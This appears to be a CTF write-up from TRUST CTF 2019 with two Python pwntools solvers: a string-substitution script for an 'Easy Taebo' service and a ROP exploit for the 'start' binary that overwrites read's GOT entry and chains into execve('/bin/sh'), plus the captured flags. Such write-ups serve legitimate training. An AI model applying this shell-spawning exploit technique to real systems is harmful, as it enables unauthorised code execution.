Write-up
TRUST CTF
dtqdtq01
2019. 2. 17. 04:41
Easy Taebo
from pwn import *
# Solver for the "Easy Taebo" service. Each of the 100 rounds delivers one line
# of move names (apparently joined by " + "); the answer is that line with every
# move name swapped for its ASCII-art figure, figures separated by spaces.
# NOTE(review): written for Python 2 pwntools, where recvline() returns str.
# On Python 3 it returns bytes and these str replacements would raise TypeError.
c = remote('server.trustctf.com', 44923)

# Substitution order matters: "left_mid_jab" and "right_mid_jab" are rewritten
# before the bare "mid_jab" that both of them contain.
figures = [
    ("left_jab", "@==(^0^)@"),
    ("left_mid_jab", "@=(^0^)@"),
    ("right_mid_jab", "@(^0^)=@"),
    ("mid_jab", "@(^0^)@"),
    ("right_jab", "@(^0^)==@"),
    ("left_hook", "@(^0^)@=="),
    ("right_hook", "==@(^0^)@"),
    ("left_speedball", "@@@(^0^)"),
    ("right_speedball", "(^0^)@@@"),
    ("left_kick", "@||(^0^)==@"),
    ("mid_kick", "@==(^||^)==@"),
    ("right_kick", "@==(^0^)||@"),
]

for i in range(1, 101):
    # Skip everything up to and including this round's prompt.
    c.recvuntil("Taebo %s : " %i)
    line = c.recvline()
    for name, art in figures:
        # At most 5 occurrences of each move are rewritten per round; a round
        # with more repeats of one move would be answered incorrectly.
        line = line.replace(name, art, 5)
    # Drop the trailing " >> " marker once, then split into individual figures.
    moves = line.replace(" >> \n", "", 1).split(' + ')
    print("level%s" %i)
    print(moves)
    print(len(moves))
    # Every figure is followed by one space, the last one included.
    answer = "".join(move + ' ' for move in moves)
    c.send(answer + '\n')
# Hand the connection to the terminal to read whatever the server prints next.
c.interactive()
TRUST{w0w_y0u_9o7_4_w0nd3rfu1_b0dy_lik3_m3}
start
from pwn import *
# Exploit script for the "start" challenge binary, run here against a local
# process; the remote endpoint is kept commented out as in the original.
#io = remote('server.trustctf.com', 10392)
io = process('./start')
elf = ELF('./start')

# Gadget addresses are hard-coded, so they only hold for this exact build loaded
# at a fixed base. NOTE(review): that implies a non-PIE binary, and the write
# into read's GOT slot below implies the GOT is writable (no full RELRO);
# confirm both, e.g. with checksec, since either hardening would break this.
pop_rsi = 0x4005ed  # pop rsi
pop_rax_rdx_rdi_rsi = 0x4005ea  # pop rax,rdx,rdi,rsi

binsh = "/bin/sh\x00"
# Single byte sent as the second message. It is presumably consumed by the
# second read@plt call and so lands in read's GOT entry; confirm against the binary.
got_low_byte = "\x7b"

scratch = p64(elf.bss())
read_plt = p64(elf.plt['read'])

chain = [
    # rsi = start of .bss, then call read@plt
    p64(pop_rsi), scratch, read_plt,
    # rsi = read's GOT slot, then call read@plt again
    p64(pop_rsi), p64(elf.got['read']), read_plt,
    # rax = 59 (execve on x86-64 Linux), rdx = 0, rdi = .bss, rsi = 0
    p64(pop_rax_rdx_rdi_rsi), p64(59), p64(0), scratch, p64(0),
    # final transfer through read@plt, whose GOT slot was written to above
    read_plt,
]

# 24 filler bytes precede the chain. NOTE(review): presumably the distance to
# the saved return address; not verifiable from this script.
payload = "A"*24 + "".join(chain) + binsh

# The two sends are not synchronised with the target. How its read() calls split
# this input depends on the binary and on timing; neither is visible here.
io.sendline(payload)
io.send(got_low_byte)
io.interactive()
TRUST{7h3_e4sie5t_t4sk_in_TRUST_CTF}